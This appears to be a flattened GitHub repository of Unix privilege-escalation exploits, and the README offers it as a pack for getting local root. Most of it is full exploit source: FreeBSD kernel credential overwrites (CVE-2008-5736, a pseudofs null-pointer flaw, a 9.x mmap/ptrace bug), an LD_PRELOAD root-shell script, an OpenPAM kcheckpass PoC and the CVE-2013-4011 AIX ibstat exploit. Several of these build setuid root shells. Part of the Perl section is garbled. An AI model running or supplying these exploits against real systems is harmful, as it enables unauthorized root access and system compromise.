BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_KILL) 70 | 71 | #define EXAMINE_SYSCALL \ 72 | BPF_STMT(BPF_LD+BPF_W+BPF_ABS, syscall_nr) 73 | 74 | #define ALLOW_SYSCALL(name) \ 75 | BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, __NR_##name, 0, 1), \ 76 | BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_ALLOW) 77 | 78 | #define DISALLOW_SYSCALL(name) \ 79 | BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, __NR_##name, 0, 1), \ 80 | BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_KILL) 81 | 82 | #define KILL_PROCESS \ 83 | BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_KILL) 84 | 85 | #define CONTINUE_EXEC \ 86 | BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_ALLOW) 87 | 88 | #endif /* _SECCOMP_BPF_H_ */ 89 | -------------------------------------------------------------------------------- /BSD/2005/FreeBSDmaster.passwd.c: -------------------------------------------------------------------------------- 1 | /* 2 | ** FreeBSD master.passwd disclosure exploit 3 | ** by kcope in 2005, kingcope[at]gmx.net 4 | ** thanks to revoguard 5 | ** just compile and execute .. look into the kmem file 6 | ** it contains the master.passwd 7 | ** tested on unpatched FreeBSD 4.11-RELEASE 8 | ** advisory: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-05:02.sendfile.asc 9 | ** +++KEEP PRIV8+++ 10 | */ 11 | 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | 20 | #define BUF_SIZ 4096 21 | 22 | void dolisten() { 23 | int s,c; 24 | struct sockaddr_in addr; 25 | struct sockaddr_in cli; 26 | socklen_t cli_size; 27 | char buf[BUF_SIZ]; 28 | FILE *f=fopen("kmem", "w"); 29 | 30 | addr.sin_addr.s_addr = INADDR_ANY; 31 | addr.sin_port = htons(31337); 32 | addr.sin_family = AF_INET; 33 | 34 | s = socket(PF_INET, SOCK_STREAM, 0); 35 | if (bind(s, (struct sockaddr*) &addr, sizeof(addr)) == -1) 36 | { 37 | perror("bind() failed"); 38 | exit(1); 39 | } 40 | 41 | listen(s, 3); 42 | 43 | c = accept(s, (struct sockaddr*) &cli, &cli_size); 44 | 45 | while (recv(c, buf, sizeof(buf) - 1, 0) > 0) { 46 | fwrite(buf, sizeof(buf), 1, f); 47 | } 48 | 49 | } 50 | 51 | int main() { 52 | int input_fd,fd,s,k; 53 | struct stat file_info; 54 | off_t offset = 0; 55 | FILE *f; 56 | int i=0; 57 | struct sockaddr_in addr; 58 | char st[]="A"; 59 | 60 | f=fopen("sendfile1", "w"); 61 | for (i=0; i!=64000000; i++) { 62 | fwrite(st, 1, 1, f); 63 | } 64 | fclose(f); 65 | 66 | input_fd = open ("sendfile1", O_RDWR); 67 | fstat (input_fd, &file_info); 68 | 69 | if (fork() != 0) { 70 | sleep(2); 71 | s = socket(PF_INET, SOCK_STREAM, 0); 72 | 73 | addr.sin_addr.s_addr = INADDR_ANY; 74 | addr.sin_port = htons(31337); 75 | addr.sin_family = AF_INET; 76 | 77 | if (connect(s, (struct sockaddr*) &addr, sizeof(addr)) == -1) 78 | { 79 | perror("connect() failed"); 80 | return 2; 81 | } 82 | 83 | if (fork() != 0) { 84 | if (sendfile (input_fd, s, offset, 64000000, NULL, NULL, 0) == -1) { 85 | perror("sendfile()"); 86 | return -1; 87 | } 88 | } else { 89 | f=fopen("sendfile1", "w"); 90 | fclose(f); 91 | for (k=0;k!=10;k++) 92 | system("/usr/bin/chsh -s /bin/sh"); 93 | wait(); 94 | } 95 | } else { 96 | dolisten(); 97 | wait(); 98 | } 99 | return 0; 100 | } -------------------------------------------------------------------------------- /BSD/2008/CVE-2008-5736.c: -------------------------------------------------------------------------------- 1 | /* 2 | * This is a quick and very dirty exploit for the FreeBSD protosw vulnerability 3 | * defined here: 4 | * http://security.freebsd.org/advisories/FreeBSD-SA-08:13.protosw.asc 5 | * 6 | * This will overwrite your credential structure in the kernel. This will 7 | * affect more than just the exploit's process, which is why this doesn't 8 | * spawn a shell. When the exploit has finished, your login shell should 9 | * have euid=0. 10 | * 11 | * Enjoy, and happy holidays! 12 | * - Don "north" Bailey (don.bailey@gmail.com) 12/25/2008 13 | */ 14 | 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | 28 | #define PAGES 1 29 | #define PATTERN1 0x8f8f8f8f 30 | #define PATTERN2 0x6e6e6e6e 31 | 32 | typedef unsigned long ulong; 33 | typedef unsigned char uchar; 34 | 35 | int 36 | x(void) 37 | { 38 | struct proc * p = (struct proc * )PATTERN1; 39 | uint * i; 40 | 41 | while(1) 42 | { 43 | if(p->p_pid == PATTERN2) 44 | { 45 | i = (uint * )p->p_ucred; 46 | *++i = 0; 47 | break; 48 | } 49 | 50 | p = p->p_list.le_next; 51 | } 52 | 53 | return 1; 54 | } 55 | 56 | int 57 | main(int argc, char * argv[]) 58 | { 59 | ulong addr; 60 | uchar * c; 61 | uchar * d; 62 | uint * i; 63 | void * v; 64 | int pid; 65 | int s; 66 | 67 | if(argc != 2) 68 | { 69 | fprintf(stderr, "usage: ./x \n"); 70 | return 1; 71 | } 72 | 73 | addr = strtoul(argv[1], 0, 0); 74 | 75 | v = mmap( 76 | NULL, 77 | (PAGES*PAGE_SIZE), 78 | PROT_READ|PROT_WRITE|PROT_EXEC, 79 | MAP_ANON|MAP_FIXED, 80 | -1, 81 | 0); 82 | if(v == MAP_FAILED) 83 | { 84 | perror("mmap"); 85 | return 0; 86 | } 87 | 88 | c = v; 89 | d = (uchar * )x; 90 | while(1) 91 | { 92 | *c = *d; 93 | if(*d == 0xc3) 94 | { 95 | break; 96 | } 97 | 98 | d++; 99 | c++; 100 | } 101 | 102 | *c++ = 0xc3; 103 | 104 | c = v; 105 | while(1) 106 | { 107 | if(*(long * )c == PATTERN1) 108 | { 109 | *(c + 0) = addr >> 0; 110 | *(c + 1) = addr >> 8; 111 | *(c + 2) = addr >> 16; 112 | *(c + 3) = addr >> 24; 113 | break; 114 | } 115 | c++; 116 | } 117 | 118 | pid = getpid(); 119 | while(1) 120 | { 121 | if(*(long * )c == PATTERN2) 122 | { 123 | *(c + 0) = pid >> 0; 124 | *(c + 1) = pid >> 8; 125 | *(c + 2) = pid >> 16; 126 | *(c + 3) = pid >> 24; 127 | break; 128 | } 129 | c++; 130 | } 131 | 132 | s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA); 133 | if(s < 0) 134 | { 135 | perror("socket"); 136 | return 1; 137 | } 138 | 139 | shutdown(s, SHUT_RDWR); 140 | 141 | return 0; 142 | } 143 | 144 | // milw0rm.com [2008-12-28] 145 | -------------------------------------------------------------------------------- /BSD/2009/2009-4146.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | echo ** FreeBSD local r00t zeroday 3 | echo by Kingcope 4 | echo November 2009 5 | cat > env.c << _EOF 6 | #include 7 | 8 | main() { 9 | extern char **environ; 10 | environ = (char**)malloc(8096); 11 | 12 | environ[0] = (char*)malloc(1024); 13 | environ[1] = (char*)malloc(1024); 14 | strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.so.1.0"); 15 | 16 | execl("/sbin/ping", "ping", 0); 17 | } 18 | _EOF 19 | gcc env.c -o env 20 | cat > program.c << _EOF 21 | #include 22 | #include 23 | #include 24 | #include 25 | 26 | void _init() { 27 | extern char **environ; 28 | environ=NULL; 29 | system("echo ALEX-ALEX;/bin/sh"); 30 | } 31 | _EOF 32 | gcc -o program.o -c program.c -fPIC 33 | gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles 34 | cp w00t.so.1.0 /tmp/w00t.so.1.0 35 | ./env 36 | -------------------------------------------------------------------------------- /BSD/2010/2010-2020/nfs_mount_ex: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/BSD/2010/2010-2020/nfs_mount_ex -------------------------------------------------------------------------------- /BSD/2010/2010-4210.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Source: http://www.securityfocus.com/bid/43060/info 3 | * 18.08.2010, babcia padlina 4 | * FreeBSD 7.0 - 7.2 pseudofs null ptr dereference exploit 5 | * 6 | * 7 | * to obtain SYSENT8_SYCALL_ADDR, run: 8 | * $ kgdb /boot/kernel/kernel 9 | * (kgdb) print &sysent[8].sy_call 10 | */ 11 | 12 | #define SYSENT8_SYCALL_ADDR 0xc0c4afa4 /* FreeBSD 7.2-RELEASE */ 13 | 14 | #define _KERNEL 15 | 16 | #include 17 | #include 18 | #include 19 | 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | 26 | #include 27 | #include 28 | #include 29 | #include 30 | #include 31 | #include 32 | #include 33 | #include 34 | 35 | struct turnstile { 36 | struct mtx ts_lock; 37 | struct threadqueue ts_blocked[2]; 38 | struct threadqueue ts_pending; 39 | LIST_ENTRY(turnstile) ts_hash; 40 | LIST_ENTRY(turnstile) ts_link; 41 | LIST_HEAD(, turnstile) ts_free; 42 | struct lock_object *ts_lockobj; 43 | struct thread *ts_owner; 44 | }; 45 | 46 | volatile int gotroot = 0; 47 | 48 | static void kernel_code(void) { 49 | struct thread *thread; 50 | 51 | asm( 52 | "movl %%fs:0, %0" 53 | : "=r"(thread) 54 | ); 55 | 56 | /* 57 | * kernel_code() is called while thread is in critical section, 58 | * so we need to unset td_critnest flag to prevent panic after 59 | * nearest user mode page fault. 60 | */ 61 | thread->td_critnest = 0; 62 | thread->td_proc->p_ucred->cr_uid = 0; 63 | thread->td_proc->p_ucred->cr_prison = NULL; 64 | gotroot = 1; 65 | 66 | return; 67 | } 68 | 69 | int main(int argc, char **argv) { 70 | struct turnstile *ts = 0; 71 | 72 | if (access("/proc/curproc/cmdline", R_OK)) { 73 | printf("procfs not found.\n"); 74 | return -1; 75 | } 76 | 77 | if (mmap(0, PAGE_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANON | MAP_FIXED, -1, 0) == MAP_FAILED) { 78 | printf("mmap 0x0 failed.\n"); 79 | return -1; 80 | } 81 | 82 | memset(0, 0, PAGE_SIZE); 83 | 84 | /* 85 | * we need to call dummy extattr_get_link() here, to make 86 | * libc memory pages accessible without user mode page fault. without 87 | * it, panic will occur after next extattr_get_link(). 88 | */ 89 | extattr_get_link("/dev/null", 0, 0, 0, 0); 90 | 91 | /* overwrite sysent[8].sy_call with 0x0 */ 92 | ts->ts_blocked[0].tqh_first = (void *)(SYSENT8_SYCALL_ADDR - 0x1c); 93 | extattr_get_link("/proc/curproc/cmdline", 0, 0, 0, 0); 94 | 95 | *(char *)0x0 = 0x90; 96 | *(char *)0x1 = 0xe9; 97 | *(unsigned long *)0x2 = &kernel_code; 98 | 99 | asm( 100 | "movl $0x8, %eax;" 101 | "int $0x80;" 102 | ); 103 | 104 | if (gotroot) { 105 | printf("oops, I did it again.\n"); 106 | setuid(0); 107 | setgid(0); 108 | execl("/bin/sh", "sh", NULL); 109 | } 110 | 111 | printf("exploit failed.\n"); 112 | 113 | return 0; 114 | } 115 | -------------------------------------------------------------------------------- /BSD/2011/8.1/bsd.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | # kcheckpass invoking pam_start() with user provided 4 | # service argument, what a bad idea. OpenPAM accepts that. 5 | # Maybe this pam_start() vulnerability is exploitable via 6 | # other vectors as well. 7 | # Vuln tested on a FreeBSD 8.1. It does not affect 8 | # Linux PAM, as it is checking for / character 9 | 10 | # (C) 2011 by some dude, meant as a PoC! Only use on your own 11 | # machine and on your own risk!!! 12 | # 13 | # This commit is likely to fix the bug: 14 | # http://trac.des.no/openpam/changeset/478/trunk/lib/openpam_configure.c 15 | # 16 | 17 | my $kcheckpass = "/usr/local/kde4/lib/kde4/libexec/kcheckpass"; 18 | 19 | # build suid shell 20 | open(O,">/tmp/slam.c") or die $!; 21 | print O< 24 | #include 25 | 26 | void __attribute__((constructor)) init() 27 | { 28 | char *a[] = {"/bin/sh", NULL}; 29 | setuid(0); 30 | execve(*a, a, NULL); 31 | } 32 | EOC 33 | close(O); 34 | 35 | # build fake pam module 36 | system("gcc -fPIC -Wall -c /tmp/slam.c -o /tmp/slam.o;gcc -shared -o /tmp/slam.so /tmp/slam.o"); 37 | 38 | # build fake PAM service file 39 | open(O,">/tmp/pamslam") or die $!; 40 | print O</tmp/slam.c") or die $!; 60 | print O< 63 | #include 64 | 65 | void __attribute__((constructor)) init() 66 | { 67 | char *a[] = {"/bin/sh", NULL}; 68 | setuid(0); 69 | execve(*a, a, NULL); 70 | } 71 | EOC 72 | close(O); 73 | 74 | # build fake pam module 75 | system("gcc -fPIC -Wall -c /tmp/slam.c -o /tmp/slam.o;gcc -shared -o /tmp/slam.so /tmp/slam.o"); 76 | 77 | # build fake PAM service file 78 | open(O,">/tmp/pamslam") or die $!; 79 | print O< 4 | * 5 | * Happy Birthday FreeBSD! 6 | * Now you are 20 years old and your security is the same as 20 years ago... :) 7 | * 8 | * Greetings to #nohup, _2501, boldi, eax, johnny_b, kocka, op, pipacs, prof, 9 | * sd, sghctoma, snq, spender, s2crew and others at #hekkcamp: 10 | * I hope we'll meet again at 8@1470n ;) 11 | * 12 | * Special thanks to proactivesec.com 13 | * 14 | */ 15 | 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | #include 28 | 29 | #define SH "/bin/sh" 30 | #define TG "/usr/sbin/timedc" 31 | 32 | int 33 | main(int ac, char **av) { 34 | int from_fd, to_fd, status; 35 | struct stat st; 36 | struct ptrace_io_desc piod; 37 | char *s, *d; 38 | pid_t pid; 39 | 40 | if (geteuid() == 0) { 41 | setuid(0); 42 | execl(SH, SH, NULL); 43 | return 0; 44 | } 45 | 46 | printf("FreeBSD 9.{0,1} mmap/ptrace exploit\n"); 47 | printf("by Hunger \n"); 48 | 49 | if ((from_fd = open(av[0], O_RDONLY)) == -1 || 50 | (to_fd = open(TG, O_RDONLY)) == -1) 51 | err(1, "open"); 52 | 53 | if (stat(av[0], &st) == -1) 54 | err(2, "stat"); 55 | 56 | if (((s = mmap(NULL, (size_t)st.st_size, PROT_READ, 57 | MAP_SHARED, from_fd, (off_t)0)) == MAP_FAILED) || 58 | (d = mmap(NULL, (size_t)st.st_size, PROT_READ, 59 | MAP_SHARED|MAP_NOSYNC, to_fd, (off_t)0)) == MAP_FAILED) 60 | err(3, "mmap"); 61 | 62 | if ((pid = fork()) == -1) 63 | err(4, "fork"); 64 | 65 | if (!pid) { 66 | if (ptrace(PT_TRACE_ME, pid, NULL, 0) == -1) 67 | err(5, "ptraceme"); 68 | 69 | return 0; 70 | } 71 | 72 | if (ptrace(PT_ATTACH, pid, NULL, 0) == -1) 73 | err(6, "ptattach"); 74 | 75 | if (wait(&status) == -1) 76 | err(7, "wait"); 77 | 78 | piod.piod_op = PIOD_WRITE_D; 79 | piod.piod_offs = d; 80 | piod.piod_addr = s; 81 | piod.piod_len = st.st_size; 82 | 83 | if (ptrace(PT_IO, pid, (caddr_t)&piod, 0) == -1) 84 | err(8, "ptio"); 85 | 86 | execl(TG, TG, NULL); 87 | 88 | return 0; 89 | } 90 | -------------------------------------------------------------------------------- /BSD/2013/9.0/9.0: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/BSD/2013/9.0/9.0 -------------------------------------------------------------------------------- /IBM_AIX/2013/aix-r00t.sh: -------------------------------------------------------------------------------- 1 | # Also available as a module in Metasploit 2 | 3 | # Exploit-DB Note: Screenshot provided by exploit author 4 | # 5 | 6 | #!/bin/sh 7 | # Exploit Title: IBM AIX 6.1 / 7.1 local root privilege escalation 8 | # Date: 2013-09-24 9 | # Exploit Author: Kristian Erik Hermansen 10 | # Vendor Homepage: http://www.ibm.com 11 | # Software Link: http://www-03.ibm.com/systems/power/software/aix/about.html 12 | # Version: IBM AIX 6.1 and 7.1, and VIOS 2.2.2.2-FP-26 SP-02 13 | # Tested on: IBM AIX 6.1 14 | # CVE: CVE-2013-4011 15 | echo ' 16 | mm mmmmm m m 17 | ## # # # 18 | # # # ## 19 | #mm# # m""m 20 | # # mm#mm m" "m 21 | ' 22 | echo "[*] AIX root privilege escalation" 23 | echo "[*] Kristian Erik Hermansen" 24 | echo "[*] https://linkedin.com/in/kristianhermansen" 25 | echo " 26 | +++++?????????????~.:,.:+???????????++++ 27 | +++++???????????+...:.,.,.=??????????+++ 28 | +++???????????~.,:~=~:::..,.~?????????++ 29 | +++???????????:,~==++++==~,,.?????????++ 30 | +++???????????,:=+++++++=~:,,~????????++ 31 | ++++?????????+,~~=++++++=~:,,:????????++ 32 | +++++????????~,~===~=+~,,::,:+???????+++ 33 | ++++++???????=~===++~~~+,,~::???????++++ 34 | ++++++++?????=~=+++~~~:++=~:~+???+++++++ 35 | +++++++++????~~=+++~+=~===~~:+??++++++++ 36 | +++++++++?????~~=====~~==~:,:?++++++++++ 37 | ++++++++++????+~==:::::=~:,+??++++++++++ 38 | ++++++++++?????:~~=~~~~~::,??+++++++++++ 39 | ++++++++++?????=~:~===~,,,????++++++++++ 40 | ++++++++++???+:==~:,,.:~~..+??++++++++++ 41 | +++++++++++....==+===~~=~,...=?+++++++++ 42 | ++++++++,........~=====..........+++++++ 43 | +++++................................++= 44 | =+:....................................= 45 | " 46 | TMPDIR=/tmp 47 | TAINT=${TMPDIR}/arp 48 | RSHELL=${TMPDIR}/r00t-sh 49 | 50 | cat > ${TAINT} <<-! 51 | #!/bin/sh 52 | cp /bin/sh ${RSHELL} 53 | chown root ${RSHELL} 54 | chmod 4555 ${RSHELL} 55 | ! 56 | 57 | chmod 755 ${TAINT} 58 | PATH=.:${PATH} 59 | export PATH 60 | cd ${TMPDIR} 61 | /usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null 62 | if [ -e ${RSHELL} ]; then 63 | echo "[+] Access granted. Don't be evil..." 64 | ${RSHELL} 65 | else 66 | echo "[-] Exploit failed. Try some 0day instead..." 67 | fi -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | Unix-Privilege-Escalation-Exploits-Pack 2 | ======================================= 3 | 4 | Exploits for getting local root on Linux, BSD, AIX, HP-UX, Solaris, RHEL, SUSE etc. 5 | If anyone is willing to work with me and organize this better, it will be helpful to many... 6 | 7 | --------------------------------------------------------------------------------